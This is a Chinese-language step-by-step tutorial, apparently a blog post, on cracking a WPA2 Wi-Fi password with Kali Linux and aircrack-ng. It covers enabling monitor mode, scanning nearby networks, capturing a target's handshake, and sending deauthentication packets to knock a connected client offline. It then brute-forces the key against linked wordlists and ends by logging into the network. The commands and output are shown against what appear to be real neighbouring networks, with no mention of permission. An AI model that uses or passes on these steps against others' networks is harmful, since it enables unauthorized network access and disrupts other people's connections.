前期准备：

　　kali 系统

　　外置无线网卡

破解过程：

　　首先，需要登录kali系统，可以是虚拟机。

　　在虚拟机中设置点击 虚拟机-可移动设备-无线网卡的名称，将无线网卡绑定到kali虚拟机上。

　　在kali中切换到root账户：sudo su root

　　使用命令：ifconfig 查看无线网卡是否正常接入：一般会回显wlan0，记住这个wlan0 网卡名称

┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163 mtu 1500
ether 00:0c:29:4f:04:de txqueuelen 1000 (Ethernet)
RX packets 5401114 bytes 708741419 (675.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4868778 bytes 457372067 (436.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 37851 bytes 14126452 (13.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37851 bytes 14126452 (13.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4099 mtu 1500
ether 06:8a:73:6a:51:48 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

　　使用命令：airmon-ng 查看网卡是否支持监听功能：有回显说明支持监听功能。

┌──(rootkali)-[/home/kali/Desktop]
└─# airmon-ng

PHY Interface Driver Chipset

phy4 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070

　　使用命令：airmon-ng start wlan0 激活无线网卡的监听模式

┌──(rootkali)-[/home/kali/Desktop]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name  
531 NetworkManager  

969681 wpa_supplicant

PHY Interface Driver Chipset

phy4 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy4]wlan0 on [phy4]wlan0mon)
(mac80211 station mode vif disabled for [phy4]wlan0)

　　返回enabled说明已经激活，这时使用ifconfig命令再次查看无线网卡，可能会发现无线网卡名称变为wlan0mon

┌──(rootkali)-[/home/kali/Desktop]
└─# ifconfig
eth0: flags=4163 mtu 1500
ether 00:0c:29:4f:04:de txqueuelen 1000 (Ethernet)
RX packets 5401114 bytes 708741419 (675.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4868778 bytes 457372067 (436.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 37851 bytes 14126452 (13.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37851 bytes 14126452 (13.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0mon: flags=4163 mtu 1500
unspec C8-3A-35-CE-82-22-00-8C-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

　　使用命令：airodump-ng wlan0mon 扫描当前周边环境的WiFi信号，这里的wlan0mon是当前无线网卡的网卡名称，具体名称需要自行更换。如何扫不出来，请插拔一下无线网卡，再次使用命

　　令：airmon-ng start wlan0以及airodump-ng wlan0mon。

CH 5 ][ Elapsed: 6 s ][ 2023-01-20 21:23

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

5A:41:20:A3:5E:D9 -70 2 0 0 1 540 WPA2 CCMP PSK
74:85:C4:5A:8E:2D -56 2 0 0 6 270 WPA2 CCMP PSK scivous
D6:B7:09:B2:D5:4E -65 4 0 0 3 360 WPA2 CCMP PSK
50:78:B3:61:04:60 -67 2 0 0 4 130 WPA2 CCMP PSK ChinaNet-x5cZ
48:73:97:01:2C:46 -64 2 0 0 9 130 OPN
C8:6C:20:46:E6:AC -72 2 0 0 4 130 WPA2 CCMP PSK ChinaNet-5Zzh
48:73:97:01:2C:47 -73 2 0 0 9 130 WPA2 CCMP PSK ChinaNet-2.4G-2C45
F0:55:01:F3:EF:75 -75 2 0 0 11 360 WPA2 CCMP PSK ChinaNet-G64JFP_Wi-Fi5

BSSID STATION PWR Rate Lost Frames Notes Probes

(not associated) 34:EA:34:9C:A1:F9 -74 0 - 1 15 2 ChinaNet-q97E
C8:3A:35:06:11:08 16:1E:8A:6F:A0:15 -1 11e- 0 0 3
Quitting…

　　找到需要破解的wifi名称ESSID这一栏：比如scivous，记录这个mac地址（74:85:C4:5A:8E:2D）以及CH号（6）。CH表示无线网络信道，BSSID表示无线 AP 的硬件地址。

　　找到之后，即可CRTL+D结束运行。

　　下面开始抓包：

　　使用命令：airodump-ng -c 6 --bssid 74:85:C4:5A:8E:2D -w /home/kali/Desktop/data wlan0mon

　　这里的6是指CH号，bssid是指bssid号，-w后面写入要保存的文件地址以及对应的文件名称，wlan0mon是指网卡名称。

CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

74:85:C4:5A:8E:2D -66 38 48 85 15 6 270 WPA2 CCMP PSK H3C_1703

BSSID STATION PWR Rate Lost Frames Notes Probes

74:85:C4:5A:8E:2D E4:93:6A:CB:87:39 -46 0 - 1e 1114 22
74:85:C4:5A:8E:2D 64:61:40:F4:47:6D -48 1e- 1e 1430 74

　　出现这个界面，说明已经开始抓包了。如果没有出现，继续插拔无线网卡，按照之前的操作在来一遍。

　　抓包过程可能比较慢，这时可以进行ack攻击，加快抓包进程，这时不要关闭抓包，打开新的terminal，使用命令：

　　aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon

　　这里的10代表攻击10次，-a为bssid号，-c为station号（用户硬件设备地址）。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon 1 ⨯
[sudo] password for kali:
21:50:17 Waiting for beacon frame (BSSID: 74:85:C4:5A:8E:2D) on channel 6
21:50:18 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [24|49 ACKs]
21:50:18 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [47|31 ACKs]
21:50:19 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [11|40 ACKs]
21:50:20 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 8|45 ACKs]
21:50:20 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 5|38 ACKs]

　　查看抓包界面， CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41后面是否出现][ WPA handshake: 74:85:C4:5A:8E:2D，这时，就代表已经抓到了包，在相应的位置会新生成5个文件，找到cap结尾的

　　文件：

　　

暴力破解：

　　使用wifi字典对data-01.cap进行hash暴力破解：这里的破解可以离线破解了，不需要联网。

　　使用命令：aircrack-ng -w /home/kali/Desktop/password.txt -b 74:85:C4:5A:8E:2D /home/kali/Desktop/data-01.cap

　　字典文件可以参考：https://github.com/conwnet/wpa-dictionary，https://www.freedidi.com/2503.html，也可以自己自行收集。

　　破解成功之后，使用相应的密码，登录wifi即可。